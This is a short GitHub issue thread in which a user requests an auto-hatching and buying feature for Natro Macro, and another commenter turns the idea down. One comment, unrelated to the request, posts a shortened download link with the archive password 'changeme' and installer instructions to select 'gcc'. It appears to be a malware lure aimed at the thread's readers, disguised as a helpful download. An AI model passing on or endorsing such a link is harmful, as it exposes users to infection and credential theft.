### ISSUE TITLE
Auto Buyer/Hatching 

### ISSUE THREAD

**Issue by RGXOnYT** [NatroTeam/NatroMacro#695]
### Have you searched the existing suggestions?

Yes

### What is your suggestion?

make like an auto hatcher so basicly there will be another tab called Hatching and Buying in the Misc section and there will be displays to buy basic eggs, tools, backpacks, others like royal jellys and if it sees the screen idk anything about coding but i think you guys can make it so it goes to the specific

### How will this improve Natro Macro?

i want that feature so the macro got more things to it and to be fun for all other users

### What is your Discord username?

rg_lfr_124

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Noobyguy775** [comment]
no, the macro isn't a player replacement
